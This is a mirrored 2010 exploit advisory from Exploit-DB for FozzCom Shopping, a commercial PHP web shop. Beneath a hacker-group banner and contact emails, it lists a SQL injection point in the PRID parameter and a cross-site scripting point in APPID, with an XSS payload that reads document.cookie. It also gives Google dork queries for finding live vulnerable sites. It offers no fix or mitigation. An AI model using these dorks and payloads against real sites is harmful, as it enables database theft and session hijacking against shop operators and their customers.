Fozzcom Shopping < 7.94 / < 8.04 - Multiple Vulnerabilities

• Exploit Database
• 9 阅读

• 作者： Dr.0rYX & Cr3W-DZ
  日期： 2010-11-18
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/15571/

•  
   Exploit Title:FozzCom shopping<= 7.94+8.04Multiple Remote Vulnerabilities
   Date: 12.10.2010
   Author: Dr.0rYX and Cr3w-DZ
   Category: webapps/0day
   Version: 7.94+8.04
  
  ****************************************************************************************************
  * _______ ___________.__ ___________.__*
  *____ \ _\______\_____/||__ _____\_ _____/______|__| ____ _____*
  * /\//_\\___ \|| ||\ ______ \__\|__) \___ \|/ ___\\__\ *
  *| |\\_/ \| \/|| | Y\ /_____// __ \_| \ || \/\\___ / __ \_ *
  *|___|/\_____/__| |____| |___|/ (____/\___/ |__||__|\___>____/ *
  * \/ \/ \/ \/ \/\/ \/*
  *.____ __*
  *______ ____ ______ _________|__|/|_ ___.__. _/|_____ __________ *
  * /___// __ \_/ ___\||\___ \\ __< || \ __\/ __ \\__\/ \*
  * \___ \\___/\\___||/|| \/|||\___||| \___/ / __ \|Y Y\ *
  */____>\___>\___>____/ |__||__||__|/ ____||__|\___>____/__|_|/ *
  * \/ \/ \/ \/ \/ \/\/*
  *Pr!v8 Expl0iT AND t00l ** *
  *ALGERIAN HACKERS*
  *********************************- NORTH-AFRICA SECURITY TEAM -*************************************
   
  [!]FozzCom shopping<= 7.94+8.04Multiple Remote Vulnerabilities 
  [!] Author: Dr.0rYX and Cr3w-DZ
  [!] MAIL: sniper-dz@hotmail.de<mailto:sniper-dz@hotmail.de>&Cr3w@hotmail.de<mailto:Cr3w@hotmail.de>
   
  ***************************************************************************/
  [!] notice :
   Dr.0rYX:MY OLD EMAIL VX3@HOTMAIL.DECLOSED
   MY NEW EMAIL ISSNIPER-DZ@HOTMAIL.DE
  
  ***************************************************************************/
  [ Software Information ]
   
  [+] Vendor : http://www.fozztech.se
  [+] script : FozzCom shopping
  [+] Download : http://www.fozztech.se (sell script )
  [+] Vulnerability : SQL injection Vulnerability
  xss Vulnerability
  [+] Dork : inurl:"myshop_start.php?APPID="
  [+] Dork :allintext:"Powered by FozzCom."
   
  **************************************************************************/
  [ Vulnerable File 1]
   
  http://server/[path]/myshop_start.php?APPID=2&PRID=sql[N.A.S.T ]
  
  [ Exploit 1 ]
   
  http://server/myshop/myshop_start.php?APPID=2&PRID= SQL INJECTION 
  
  
  *************************************************************************/
  [ Vulnerable File 2]
  
  http://server/[path]/myshop_start.php?APPID=xss[N.A.S.T ]
  
  [ Exploit 2 ]
  http://www.server/myshop/myshop_start.php?APPID='><script>alert(document.cookie)</script>
  
  [GReet ]
   
  [+] : Exploit-db.com , v4-team.com